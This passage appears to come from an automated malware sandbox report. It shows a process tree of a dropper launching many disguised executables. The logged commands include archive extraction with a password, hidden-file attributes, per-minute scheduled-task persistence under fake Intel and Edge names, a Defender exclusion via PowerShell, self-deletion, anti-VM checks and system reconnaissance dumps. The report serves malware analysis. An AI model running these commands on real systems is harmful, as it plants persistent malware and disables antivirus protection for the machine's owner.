                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    PID:7060
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
                                      • Suspicious use of SetWindowsHookEx
                                      PID:7108
                                    • C:\Windows\system32\PING.EXE
                                      "C:\Windows\system32\PING.EXE" 127.1.0.1
                                      4⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Runs ping.exe
                                      PID:4496
                                • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                  C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                  2⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:3788
                                • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                  C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:4956
                                  • C:\Windows\explorer.exe
                                    explorer.exe
                                    3⤵
                                      PID:6712
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                      3⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      PID:7004
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                        • Suspicious use of SetWindowsHookEx
                                        PID:7088
                                      • C:\Windows\system32\PING.EXE
                                        "C:\Windows\system32\PING.EXE" 127.1.10.1
                                        4⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:7320
                                  • C:\Users\Admin\MicrosoftProfile.exe
                                    C:\Users\Admin\MicrosoftProfile.exe
                                    2⤵
                                      PID:6476
                                    • C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                      C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                      2⤵
                                        PID:7184
                                      • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                        C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:4792
                                        • C:\Windows\explorer.exe
                                          explorer.exe
                                          3⤵
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4916
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                          3⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          PID:1976
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            4⤵
                                            • Suspicious use of SetWindowsHookEx
                                            PID:7908
                                          • C:\Windows\system32\PING.EXE
                                            "C:\Windows\system32\PING.EXE" 127.1.0.1
                                            4⤵
                                            • System Network Configuration Discovery: Internet Connection Discovery
                                            • Runs ping.exe
                                            PID:5540
                                      • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                        C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                        2⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:756
                                      • C:\Users\Admin\MicrosoftProfile.exe
                                        C:\Users\Admin\MicrosoftProfile.exe
                                        2⤵
                                          PID:2560
                                        • C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                          C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                          2⤵
                                            PID:3168
                                          • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                            C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:6292
                                            • C:\Windows\explorer.exe
                                              explorer.exe
                                              3⤵
                                                PID:7936
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 7936 -s 668
                                                  4⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:1884
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                3⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                PID:5564
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  4⤵
                                                    PID:8028
                                                  • C:\Windows\system32\PING.EXE
                                                    "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                    4⤵
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:7256
                                              • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                2⤵
                                                  PID:6260
                                                  • C:\Windows\explorer.exe
                                                    explorer.exe
                                                    3⤵
                                                      PID:2472
                                                  • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                    C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                    2⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6220
                                                  • C:\Users\Admin\MicrosoftProfile.exe
                                                    C:\Users\Admin\MicrosoftProfile.exe
                                                    2⤵
                                                      PID:6376
                                                    • C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                                      C:\Users\Admin\AppData\Roaming\System32\xda.dll
                                                      2⤵
                                                        PID:7124
                                                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                        2⤵
                                                          PID:7080
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                        1⤵
                                                          PID:1272
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                          1⤵
                                                            PID:1292
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                            1⤵
                                                              PID:1328
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                              1⤵
                                                                PID:1368
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                1⤵
                                                                  PID:1440
                                                                  • C:\Windows\system32\sihost.exe
                                                                    sihost.exe
                                                                    2⤵
                                                                      PID:2832
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                    1⤵
                                                                      PID:1572
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                      1⤵
                                                                        PID:1604
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                        1⤵
                                                                          PID:1628
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                          1⤵
                                                                            PID:1720
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                            1⤵
                                                                              PID:1740
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                              1⤵
                                                                                PID:1784
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1852
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                  1⤵
                                                                                    PID:1932
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                    1⤵
                                                                                      PID:1940
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                      1⤵
                                                                                        PID:1520
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                        1⤵
                                                                                          PID:1432
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                          1⤵
                                                                                            PID:1532
                                                                                          • C:\Windows\System32\spoolsv.exe
                                                                                            C:\Windows\System32\spoolsv.exe
                                                                                            1⤵
                                                                                              PID:2100
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                              1⤵
                                                                                                PID:2196
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                1⤵
                                                                                                  PID:2372
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                                  1⤵
                                                                                                    PID:2496
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                    1⤵
                                                                                                      PID:2504
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      PID:2668
                                                                                                    • C:\Windows\sysmon.exe
                                                                                                      C:\Windows\sysmon.exe
                                                                                                      1⤵
                                                                                                        PID:2716
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                        1⤵
                                                                                                          PID:2736
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                          1⤵
                                                                                                            PID:2744
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                            1⤵
                                                                                                              PID:2776
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                              1⤵
                                                                                                                PID:2888
                                                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3004
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                                  1⤵
                                                                                                                    PID:664
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                    1⤵
                                                                                                                      PID:3312
                                                                                                                    • C:\Windows\Explorer.EXE
                                                                                                                      C:\Windows\Explorer.EXE
                                                                                                                      1⤵
                                                                                                                        PID:3432
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                                                                                          2⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:1652
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            3⤵
                                                                                                                              PID:428
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\random.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
                                                                                                                              3⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:4408
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:2184
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  5⤵
                                                                                                                                    PID:3136
                                                                                                                                  • C:\Windows\system32\mode.com
                                                                                                                                    mode 65,10
                                                                                                                                    5⤵
                                                                                                                                      PID:1728
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2856
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3112
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4752
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:720
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3876
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3052
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1924
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                      7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1076
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +H "in.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:3980
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                                                                                                      "in.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:3000
                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                        6⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:4680
                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                        6⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:264
                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                        6⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4708
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell ping 127.0.0.1; del in.exe
                                                                                                                                        6⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:4436
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                          7⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:5036
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\client.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2080
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:376
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                                                                                                                                    4⤵
                                                                                                                                    • Drops startup file
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:4492
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3168
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5472
                                                                                                                                  • C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                    systeminfo
                                                                                                                                    4⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Gathers system information
                                                                                                                                    PID:6024
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3676
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:4220
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3908
                                                                                                                                  • C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                    "C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:3420
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1468
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2036
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                    4⤵
                                                                                                                                      PID:1656
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        5⤵
                                                                                                                                          PID:5672
                                                                                                                                        • C:\Windows\system32\mode.com
                                                                                                                                          mode 65,10
                                                                                                                                          5⤵
                                                                                                                                            PID:5212
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5492
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:6012
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5760
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5032
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3456
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5128
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1956
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:5124
                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                            attrib +H "in.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Views/modifies file attributes
                                                                                                                                            PID:5268
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                                                                                                                            "in.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5904
                                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                              attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                              6⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:5972
                                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                              attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                              6⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:6008
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                              6⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:6044
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell ping 127.0.0.1; del in.exe
                                                                                                                                              6⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:6076
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                7⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:5936
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:4876
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\FCTR16PHVKF3" & exit
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:5676
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /t 10
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:5576
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2120
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:5716
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:5452
